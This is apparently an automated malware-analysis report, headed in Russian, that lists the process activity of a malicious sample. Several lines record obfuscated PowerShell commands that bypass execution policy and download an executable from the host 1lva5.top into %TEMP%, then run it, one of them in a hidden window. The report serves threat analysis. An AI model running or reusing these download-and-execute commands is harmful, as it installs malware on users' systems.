Техническая информация
- '<SYSTEM32>\cmd.exe' /c po^wer^shell -Executionpolicy Bypass -Noprofile -command (New-Object Net.Webclient).('Downl'+'oadfile').invoke('ht'+'tp://'+'1lva5.top/ceylontea/','%TEMP%\ssuk.exe');starT-procEss '%TEMP%\ss...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1944
- %TEMP%\957066.cvr
- DNS ASK 1l##5.top
- '<SYSTEM32>\cmd.exe' /c po^wer^shell -Executionpolicy Bypass -Noprofile -command (New-Object Net.Webclient).('Downl'+'oadfile').invoke('ht'+'tp://'+'1lva5.top/ceylontea/','%TEMP%\ssuk.exe');starT-procEss '%TEMP%\ss...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executionpolicy Bypass -Noprofile -command (New-Object Net.Webclient).('Downl'+'oadfile').invoke('ht'+'tp://'+'1lva5.top/ceylontea/','%TEMP%\ssuk.exe');starT-procEss '%TEMP%\ssuk.exe';